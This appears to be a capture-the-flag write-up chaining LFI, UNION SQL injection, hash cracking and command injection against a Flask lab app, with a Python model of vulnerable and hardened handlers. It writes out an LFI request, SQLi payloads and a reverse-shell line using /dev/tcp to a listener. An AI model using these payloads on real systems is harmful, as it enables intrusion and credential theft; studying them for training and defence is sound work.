In this post we walk through an attack chain against a vulnerable Flask application: Local File Inclusion (LFI) to read a secret, SQL Injection (SQLi) to pull credentials, offline hash cracking, and finally a reverse shell to take control of the host. The Python script that automates the whole chain is linked below as the PoC code.
Challenge Overview
Link to the challenge: Whitebox Web Application Pentest
PoC Code: Whitebox Web Application Pentest Exploit
📁 Note: The full source code is located in the Source-Code-Lab directory.
Step 1: Extract API Key Using LFI
First, we use a Local File Inclusion (LFI) vulnerability to read the API key from the server's file system. The download_file endpoint passes the file parameter to the file system without restricting it to an intended download directory, so a path relative to the application directory returns the configuration file that holds the key.
Use the following request to trigger the LFI vulnerability:
http://10.0.1.4:5000/download_file?file=conf/apikey.txt
Step 2: SQL Injection to Extract Username
Next, we use SQL Injection against the profile endpoint to extract a valid username from the database.
Step 3: SQL Injection to Retrieve Password Hash
Continuing with the same injection point, we extract the password hash of the username found in Step 2.
Step 4: Crack the Password Hash
Once we have the password hash, we identify its format and run an offline dictionary attack against it with a wordlist such as rockyou.txt. Check the hash type first so the cracker (hashcat or John) is run in the matching mode; a wrong mode silently finds nothing.
Step 5: Login to the Application
Using the cracked password, we log in to the application as that user.
Step 6: Trigger Reverse Shell (RCE)
Finally, we get a reverse shell by injecting a command into the DNS lookup parameter, which the application hands to the system unsanitized. Start a listener on the attacking machine first; the payload makes the server connect back to it, giving us a shell on the host.
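The chain in Steps 1 to 6, modelled offline as an added example (this is not the challenge's source from Source-Code-Lab, nor the linked PoC): each vulnerable handler pattern beside its hardened form for the LFI, the SQLi, the hash cracking and the DNS lookup. The application directory, the users table layout, unsalted SHA-256 hashes, the wordlist, the id and host parameter names and the listener address are all assumptions; sqlite3 stands in for the real database, the login of Step 5 is not modelled, and the injected shell command is only built, never executed.

```python
"""Offline model of the weaknesses chained in the write-up. Constructed for
illustration: not the challenge's source, and the handler logic, table layout,
hash algorithm and wordlist are assumptions."""
import hashlib
import posixpath
import re
import sqlite3
from typing import Optional

APP_ROOT = "/srv/flaskapp"                       # assumed application directory
PUBLIC_DIR = posixpath.join(APP_ROOT, "public")  # assumed intended download directory


# Step 1: LFI. Joining ?file= to the application root serves conf/apikey.txt
# (and any ../ path) instead of only the intended downloads.
def vulnerable_download_path(requested: str) -> str:
    return posixpath.normpath(posixpath.join(APP_ROOT, requested))


def hardened_download_path(requested: str) -> Optional[str]:
    # Resolve against the public directory and refuse anything that escapes it.
    full = posixpath.normpath(posixpath.join(PUBLIC_DIR, requested))
    if posixpath.commonpath([PUBLIC_DIR, full]) != PUBLIC_DIR:
        return None
    return full


# Steps 2-3: SQLi on the profile lookup. sqlite3 stands in for the real database.
def build_demo_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT)")
    # Unsalted SHA-256 is assumed; the challenge's hash format may differ.
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)",
               (hashlib.sha256(b"sunshine").hexdigest(),))
    return db


def vulnerable_profile_name(db: sqlite3.Connection, user_id: str) -> Optional[str]:
    # Interpolating ?id= into the query lets a UNION pull any column we want.
    row = db.execute(f"SELECT username FROM users WHERE id = {user_id}").fetchone()
    return row[0] if row else None


def hardened_profile_name(db: sqlite3.Connection, user_id: str) -> Optional[str]:
    # Type-check the input and bind it as a parameter; the payload never reaches SQL.
    try:
        uid = int(user_id)
    except ValueError:
        return None
    row = db.execute("SELECT username FROM users WHERE id = ?", (uid,)).fetchone()
    return row[0] if row else None


# Step 4: offline wordlist attack against the recovered hash.
WORDLIST = ["123456", "password", "qwerty", "sunshine", "letmein"]  # constructed stand-in for rockyou.txt


def crack_sha256(target_hash: str, wordlist) -> Optional[str]:
    for candidate in wordlist:
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
            return candidate
    return None


# Step 6: command injection through the DNS lookup parameter.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def vulnerable_lookup_command(host: str) -> str:
    # What a handler doing os.popen("nslookup " + host) would hand to /bin/sh:
    # a ';' ends nslookup's arguments and starts the attacker's command.
    return "nslookup " + host


def hardened_lookup_argv(host: str) -> Optional[list]:
    # Allow-list the hostname and pass it as a single argv element (no shell).
    if not HOSTNAME_RE.match(host):
        return None
    return ["nslookup", host]


def run_chain() -> dict:
    # Replay steps 1-4 and 6 against the model and return each result.
    db = build_demo_db()
    leaked_user = vulnerable_profile_name(db, "0 UNION SELECT username FROM users LIMIT 1")
    leaked_hash = vulnerable_profile_name(
        db, f"0 UNION SELECT password_hash FROM users WHERE username='{leaked_user}'")
    injected = "8.8.8.8; bash -i >& /dev/tcp/10.0.1.9/4444 0>&1"  # assumed listener address
    return {
        "apikey_path": vulnerable_download_path("conf/apikey.txt"),
        "apikey_path_hardened": hardened_download_path("../conf/apikey.txt"),
        "username": leaked_user,
        "password": crack_sha256(leaked_hash, WORDLIST),
        "shell_command": vulnerable_lookup_command(injected),
        "shell_command_hardened": hardened_lookup_argv(injected),
    }
```

Calling run_chain() shows the vulnerable handlers leaking the key path, the username, the cracked password and the injected shell command, while each hardened counterpart returns None for the same input. The fixes are the ones a whitebox report would recommend: confine file reads to one directory, bind SQL parameters after type-checking, and pass validated hostnames as argv rather than through a shell.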
Execution
Run the PoC script linked above against the target. It extracts the API key, performs the SQL Injection to retrieve the username and hash, cracks the password, logs in, and finally triggers the reverse shell.
Conclusion
In this post we chained LFI, SQL Injection, hash cracking and a reverse shell to compromise a Flask application. Remember, this is for educational purposes only; such activities should only be performed on systems you have explicit permission to test.
Great practice for OSWE and eWPTX prep — covers LFI, SQLi, auth bypass, and RCE chaining.